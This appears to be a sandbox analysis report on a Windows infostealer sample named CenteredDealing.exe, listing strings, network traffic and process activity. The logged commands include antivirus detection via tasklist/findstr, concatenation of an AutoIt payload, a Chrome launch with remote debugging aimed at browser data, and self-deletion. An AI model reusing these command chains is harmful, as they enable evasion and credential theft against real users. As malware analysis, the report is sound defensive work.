    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: chrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
    Source: chrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
    Source: chrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
    Source: chrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Rip.com, 0000000C.00000000.1708125558.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp, Bridal.8.dr, Rip.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: chromecache_98.19.drString found in binary or memory: http://www.broofa.com
    Source: CenteredDealing.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: 8yu37g.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
    Source: chromecache_95.19.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
    Source: chromecache_95.19.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
    Source: chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: chromecache_98.19.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
    Source: chromecache_98.19.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
    Source: chromecache_98.19.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
    Source: chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000011.00000003.2024160852.0000211001460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023858372.00002110013BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022597317.0000211001450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022221372.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023959664.0000211001394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023814051.00002110013DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
    Source: chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023814051.00002110013DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
    Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: C:\Users\user\Desktop\CenteredDealing.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
    Source: C:\Users\user\Desktop\CenteredDealing.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
    Source: C:\Users\user\Desktop\CenteredDealing.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Windows\CruisesReggae
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Windows\JjFeature
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Windows\BlastEntered
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Windows\MontrealTeeth
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Windows\FtReleases
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Windows\DildoWitnesses
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Windows\GospelNeighbors
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Windows\ControlledCruise
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Windows\WellDepartment
    Source: C:\Users\user\Desktop\CenteredDealing.exe Code function: 0_2_0040497C
    Source: C:\Users\user\Desktop\CenteredDealing.exe Code function: 0_2_00406ED2
    Source: C:\Users\user\Desktop\CenteredDealing.exe Code function: 0_2_004074BB
    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\Desktop\CenteredDealing.exe Code function: String function: 004062A3 appears 58 times
    Source: CenteredDealing.exe Static PE information: invalid certificate
    Source: CenteredDealing.exe, 00000000.00000002.1777631815.0000000000810000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs CenteredDealing.exe
    Source: CenteredDealing.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engine Classification label: mal92.troj.spyw.evad.winEXE@47/48@9/8
    Source: C:\Users\user\Desktop\CenteredDealing.exe Code function: 0_2_004024FB CoCreateInstance
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Interactive
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
    Source: C:\Users\user\Desktop\CenteredDealing.exe File created: C:\Users\user\AppData\Local\Temp\nsb8C25.tmp
    Source: CenteredDealing.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\CenteredDealing.exe File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\CenteredDealing.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: nozukfct0.12.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: C:\Users\user\Desktop\CenteredDealing.exe File read: C:\Users\user\Desktop\CenteredDealing.exe
    Source: unknown Process created: C:\Users\user\Desktop\CenteredDealing.exe "C:\Users\user\Desktop\CenteredDealing.exe"
    Source: C:\Users\user\Desktop\CenteredDealing.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208639
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Dodge
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Borough" Architecture
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Rip.com d
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2248,i,8807016753924455708,494945956636832541,262144 /prefetch:8
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8ycbs" & exit
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exe; Section loaded: version.dll
    Source: C:\Windows\SysWOW64\timeout.exe; Section loaded: version.dll
    Source: C:\Users\user\Desktop\CenteredDealing.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: CenteredDealing.exe; Static file information: File size 1203969 > 1048576
    Source: CenteredDealing.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\CenteredDealing.exe; Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: CenteredDealing.exe; Static PE information: real checksum: 0x12b4fa should be: 0x1326f4

    Persistence and Installation Behavior

    Source: C:\Windows\SysWOW64\cmd.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
    Source: C:\Users\user\Desktop\CenteredDealing.exe; Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\tasklist.exe; Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com; Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\timeout.exe TID: 6492; Thread sleep count: 89 > 30
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com; File Volume queried: C:\ FullSizeInformation
    Source: C:\Users\user\Desktop\CenteredDealing.exe; Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\CenteredDealing.exe; Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\CenteredDealing.exe; Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Microsoft\
    Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
    Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
    Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
    Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
    Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
    Source: C:\Users\user\Desktop\CenteredDealing.exe; API call chain: ExitProcess graph end node graph_0-3677
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com; Process information queried: ProcessInformation
    Source: C:\Users\user\Desktop\CenteredDealing.exe; Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: C:\Windows\SysWOW64\tasklist.exe; Process token adjusted: Debug
    Source: C:\Users\user\Desktop\CenteredDealing.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208639
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Dodge
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Borough" Architecture
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Rip.com d
